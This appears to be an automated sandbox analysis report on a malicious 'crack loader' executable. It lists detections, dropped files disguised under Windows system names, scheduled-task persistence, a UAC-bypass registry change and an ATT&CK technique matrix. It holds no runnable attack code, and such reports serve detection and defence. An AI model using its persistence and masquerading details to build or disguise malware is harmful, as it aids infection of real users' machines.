            Source: C:\comcontainer\SurrogateRef.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2465802434.0000000002937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2486586475.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2486585028.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2472557377.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SurrogateRef.exe PID: 3472, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SwpTnCnrsAAKjgTAQ.exe PID: 6728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SwpTnCnrsAAKjgTAQ.exe PID: 6992, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2465802434.0000000002937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2486586475.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2486585028.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2472557377.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SurrogateRef.exe PID: 3472, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SwpTnCnrsAAKjgTAQ.exe PID: 6728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SwpTnCnrsAAKjgTAQ.exe PID: 6992, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts211
            Windows Management Instrumentation
            11
            Scripting
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Bypass User Account Control
            11
            Deobfuscate/Decode Files or Information
            LSASS Memory2
            File and Directory Discovery
            Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter
            1
            Scheduled Task/Job
            11
            Process Injection
            3
            Obfuscated Files or Information
            Security Account Manager47
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job
            Login Hook1
            Scheduled Task/Job
            23
            Software Packing
            NTDS441
            Security Software Discovery
            Distributed Component Object ModelInput Capture2
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Bypass User Account Control
            Cached Domain Credentials151
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items123
            Masquerading
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
            Virtualization/Sandbox Evasion
            Proc Filesystem1
            System Network Configuration Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525863 Sample: NewLoaderCracks_1.32.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 49 ip-api.com 2->49 55 Found malware configuration 2->55 57 Antivirus detection for dropped file 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 11 other signatures 2->61 10 NewLoaderCracks_1.32.exe 3 6 2->10         started        13 SwpTnCnrsAAKjgTAQ.exe 3 2->13         started        15 SwpTnCnrsAAKjgTAQ.exe 2 2->15         started        signatures3 process4 file5 45 C:\comcontainer\SurrogateRef.exe, PE32 10->45 dropped 47 C:\comcontainer\Kr8tZ.vbe, data 10->47 dropped 17 wscript.exe 1 10->17         started        process6 signatures7 53 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->53 20 cmd.exe 1 17->20         started        process8 process9 22 SurrogateRef.exe 15 37 20->22         started        27 conhost.exe 20->27         started        dnsIp10 51 ip-api.com 208.95.112.1, 49780, 49803, 49819 TUT-ASUS United States 22->51 37 C:\comcontainer\cmd.exe, PE32 22->37 dropped 39 C:\comcontainer\SwpTnCnrsAAKjgTAQ.exe, PE32 22->39 dropped 41 C:\Windows\CbsTemp\RuntimeBroker.exe, PE32 22->41 dropped 43 13 other malicious files 22->43 dropped 63 Antivirus detection for dropped file 22->63 65 Multi AV Scanner detection for dropped file 22->65 67 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->67 69 7 other signatures 22->69 29 schtasks.exe 22->29         started        31 schtasks.exe 22->31         started        33 schtasks.exe 22->33         started        35 21 other processes 22->35 file11 signatures12 process13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            NewLoaderCracks_1.32.exe68%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            NewLoaderCracks_1.32.exe100%AviraVBS/Runner.VPG
            NewLoaderCracks_1.32.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\comcontainer\cmd.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\comcontainer\Kr8tZ.vbe100%AviraVBS/Runner.VPG
            C:\Program Files (x86)\Windows Mail\SurrogateRef.exe100%AviraHEUR/AGEN.1323984
            C:\comcontainer\SurrogateRef.exe100%AviraHEUR/AGEN.1323984
            C:\Recovery\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows NT\Idle.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\Recovery\csrss.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%AviraHEUR/AGEN.1323984
            C:\comcontainer\cmd.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Mail\SurrogateRef.exe100%Joe Sandbox ML
            C:\comcontainer\SurrogateRef.exe100%Joe Sandbox ML
            C:\Recovery\WmiPrvSE.exe100%Joe Sandbox ML
            C:\Program Files\Windows NT\Idle.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Recovery\csrss.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Reference Assemblies\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Mail\SurrogateRef.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows NT\Idle.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\csrss.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\CbsTemp\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\comcontainer\SurrogateRef.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\comcontainer\SwpTnCnrsAAKjgTAQ.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\comcontainer\cmd.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
            http://ip-api.com0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            ip-api.com
            208.95.112.1
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://ip-api.com/line/?fields=hostingfalse
              • URL Reputation: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ip-api.comSurrogateRef.exe, 00000005.00000002.2465802434.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, SurrogateRef.exe, 00000005.00000002.2465802434.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, SurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmp, SurrogateRef.exe, 00000005.00000002.2465802434.0000000002600000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              208.95.112.1
              ip-api.comUnited States
              53334TUT-ASUStrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1525863
              Start date and time:2024-10-04 15:41:57 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 32s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:42
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:NewLoaderCracks_1.32.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@31/38@1/1
              EGA Information:
              • Successful, ratio: 25%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, csrss.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target SurrogateRef.exe, PID 3472 because it is empty
              • Execution Graph export aborted for target SwpTnCnrsAAKjgTAQ.exe, PID 6728 because it is empty
              • Execution Graph export aborted for target SwpTnCnrsAAKjgTAQ.exe, PID 6992 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: NewLoaderCracks_1.32.exe
              TimeTypeDescription
              09:43:07API Interceptor97x Sleep call for process: SurrogateRef.exe modified
              15:43:11Task SchedulerRun new task: SwpTnCnrsAAKjgTAQ path: "C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe"
              15:43:11Task SchedulerRun new task: SwpTnCnrsAAKjgTAQS path: "C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe"
              15:43:14Task SchedulerRun new task: csrss path: "C:\Recovery\csrss.exe"
              15:43:15Task SchedulerRun new task: csrssc path: "C:\Recovery\csrss.exe"
              15:43:15Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe"
              15:43:15Task SchedulerRun new task: RuntimeBrokerR path: "C:\Windows\CbsTemp\RuntimeBroker.exe"
              15:43:15Task SchedulerRun new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
              15:43:16Task SchedulerRun new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"
              15:43:18Task SchedulerRun new task: cmdc path: "C:\comcontainer\cmd.exe"
              15:43:18Task SchedulerRun new task: Idle path: "C:\Program Files\Windows NT\Idle.exe"
              15:43:19Task SchedulerRun new task: IdleI path: "C:\Program Files\Windows NT\Idle.exe"
              15:43:19Task SchedulerRun new task: SurrogateRef path: "C:\Program Files (x86)\windows mail\SurrogateRef.exe"
              15:43:19Task SchedulerRun new task: SurrogateRefS path: "C:\Program Files (x86)\windows mail\SurrogateRef.exe"
              15:43:21Task SchedulerRun new task: cmd path: "C:\comcontainer\cmd.exe"
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              208.95.112.1SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
              • ip-api.com/json/?fields=225545
              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
              • ip-api.com/json/?fields=225545
              SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
              • ip-api.com/json/?fields=225545
              Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
              • ip-api.com/line/?fields=hosting
              enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
              • ip-api.com/json/?fields=225545
              POP.jsGet hashmaliciousWSHRATBrowse
              • ip-api.com/json/
              gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
              • ip-api.com/json/?fields=11827
              dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
              • ip-api.com/json/?fields=11827
              kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
              • ip-api.com/line/?fields=hosting
              uidiscord.exeGet hashmaliciousAsyncRAT, XWormBrowse
              • ip-api.com/line/?fields=hosting
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ip-api.comSolaraV3.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
              • 208.95.112.1
              enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              POP.jsGet hashmaliciousWSHRATBrowse
              • 208.95.112.1
              gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
              • 208.95.112.1
              dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
              • 208.95.112.1
              kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
              • 208.95.112.1
              uidiscord.exeGet hashmaliciousAsyncRAT, XWormBrowse
              • 208.95.112.1
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              TUT-ASUSSolaraV3.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
              • 208.95.112.1
              enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
              • 208.95.112.1
              POP.jsGet hashmaliciousWSHRATBrowse
              • 208.95.112.1
              gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
              • 208.95.112.1
              dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
              • 208.95.112.1
              kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
              • 208.95.112.1
              uidiscord.exeGet hashmaliciousAsyncRAT, XWormBrowse
              • 208.95.112.1
              No context
              No context
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (950), with no line terminators
              Category:dropped
              Size (bytes):950
              Entropy (8bit):5.905373636930115
              Encrypted:false
              SSDEEP:24:qyKSLr7/Bi8rRlrvQGspRhZYt4BgKuzBOEIFoGj3dr9Y:qy3Lr7vveGe/6BOE8oqNr9Y
              MD5:D26027F86CD9B9FAB62F9E3E4CE8243E
              SHA1:90FC306EF1368DED2192580579873025175AFA3C
              SHA-256:8190B765212A82426B866BACE2C08842C1D39E522CCFF1890F6226B2808C6AF1
              SHA-512:21244DF3D2ADA053EB54C0472DFA6DD8EA57291F9426461393EA93E8B35FC7E9E45662F822D24B7485BCD384B321240ACAB15C756206777A1E7F557F4A8A4553
              Malicious:false
              Preview:142tW3kEEqTUOVW6qwkz6mNoJRHkxACiUDZYjPre4dlCbPcFKb0wJ5AOrOkFw9REouAK58WaEF4cAKN3zBaWJPZZCKrUpms5MhYqPRJMEasDAiOgBqQuj44ZVkHuQBucX9Qcwgoh1NRtgVYe6LT9V7VRn8UoJZ6DpPpBRvteBs2VmK29MnxFsvGZn8zxMAXcRODRqXNKby7mFAocGUcgl0U4IQXS55SBUZEYGkTzZmn3xdTnUXr1i10a4JIa94Ofg6Sp5QVfBmG8MbHp6u8iOaddjne7c3zfYHW1LorDBL05u1NcCddP5qRFcyGSwXDIxlkEEPdSC4hDkisrZB59Zkjr0QZXhZQnIsHJRIYw9LNAJOf3FZ2vcEsNB2Ox0Gumo352ajaQmJ9OXiimvfRIhfLD94HY4k53akWPTmdg9lITEezcUmCVzmFIs13fbBWCNFxxLSTICvJ5X29fEpESijEyeOhct7E7PGF9rCQBT3TDdKv02Xaw7DdoA9S7u0YEqMqQw9xCYC9pQAUTdrkVgS9Lmb8suTQcePXRdeD2jYX4EyYAo8eCQChXMfnVBFSFwhKBnD08orwI5EGyC8DvyNLbr9E80r1dGRIhnWXkIfYiQZcHYySCBgQiVtTn81I70SBn6jLqldmTzmKSh6kBYycjBjL4DulRXbs8XzLynmbi47tsiAFCQGiBzcmWXRm02U6Y4M5svvYvW3pD0dVCojAQ2qI4NzbWAkqjBVyWFXQerwp6xif45jMSUpfNDAf5UCvwNFCfo97QSfjFBMHoUgaaYXPWzkTE2VKpB2srf9P5m5AyFaM020lxlUXzzqqDq2Y6V3EIdaIUReycXbQYYcLCuWEqe21zTLPthDcMVDWcrQgGg5cYZRpOqWM8zXnliTBFPF5U8DDVFtUd07KjacZBgBCK0dX8Zv3YPa1a9IaWOTI7BsI2NE
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (678), with no line terminators
              Category:dropped
              Size (bytes):678
              Entropy (8bit):5.890059126904392
              Encrypted:false
              SSDEEP:12:xO9jvApfz/aHnvpdDaT4xw0jcqOulD6nq8G4RHGXsg3qf0XQGEq2XAQeY5xfwOpT:xOBWLYRdDNBjci+njG4Zu1lqwQdxfkP+
              MD5:98D2F74CA5BE2C6423DAD0E3AD61DD55
              SHA1:87156997AB3BEEA09EA47603964A5836CE01D730
              SHA-256:8916DE17CD4EBC1E6AB03978961404918BA9DA59AF315713790442588B8C6E0F
              SHA-512:84DC3C3457D6C8247631DC3000A71556B66DE9EF0AB4308BC61DA596D32A6D3D94CFDBB25A02DB387B236AC0FE73EA61B8C70FE19F4733E9DBB9231BA3D11843
              Malicious:false
              Preview:r9ondZVzkHbHbM8t3UCgJ7FesuY8OeSO3hoPasjGP4VAIkDnyvoEEEgu3K5sAWkFyNO4htTLv5RPlFWIruKd0NKyB4VPx1G2TPL4WJGEbdTIxQIyyxAPMHPlDZ3nXDY3zY5W3bvioFBW3BBuvhb900pMAk17QdrXFZTYUw4XBckHF2rBYI1zlYD8stWTjySLYnResmZ9mE8XQhGH20iHl1wqWUqkalxNKZtckNTvs2MhapsKnObtPKkg1kIX6yiBRvN1yogohwYsoPQqmf7LKE79yNkAF5z4ULQpc1W9rwLcw12mTbva1W1MxOClDgjl7eYd9lNvI8eY2eM7U7qnKYC7TD1Nzv5LMjfRdZnsN9S32dTSBEQF05bicaJ5uA6XCSLT94e5U7ZKGJF0tiLuezUQI6zCPr7ND40jSATGkUv2gRcTVTLMyL2N74KCEbqmALGLSfhtOFJJEcu0egq6gvZ2BnmXzRBJoI2UKQA0vc7tBtIfKUhiuuGOwOKo3K37DAf5kaqOg0KDyq0SeGNftdY4Cni5FW7lj9qANN5uoTC4jCaFY1Kw7YNjml261uIK2jeyAzEQLd1abdU9NchOLLoLvGYmU824K2BAilFjw3kdgxHIQ3tZM48r4TC3ab6Nl7QjcTblX8bSkKo89QWbOcrQ3UGOiLIV7X2jhh
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (429), with no line terminators
              Category:dropped
              Size (bytes):429
              Entropy (8bit):5.879881023574037
              Encrypted:false
              SSDEEP:12:X+4pxWVuHtp8YMrAoWcScKKnoOL8ySyMBapJ:OGS08YMEoWgKKoOL8/yMBaL
              MD5:35D554F314F875CD22AA345844D8E240
              SHA1:F91D0A21634FAA3E465BE5F3E8CF05E6B9F286E9
              SHA-256:1B5C112CF8B4B5698564D55ECA9854CD47A5D410AD32C495906CB0DAED2FFE1B
              SHA-512:DFB97E6F17E9205B546D8116772B07D8CE11D56D6B1AB4F3C4276436C728D6FCB471CB511307F7DC86174431FFB1959464D09E9393E38C0632084FC760C8E290
              Malicious:false
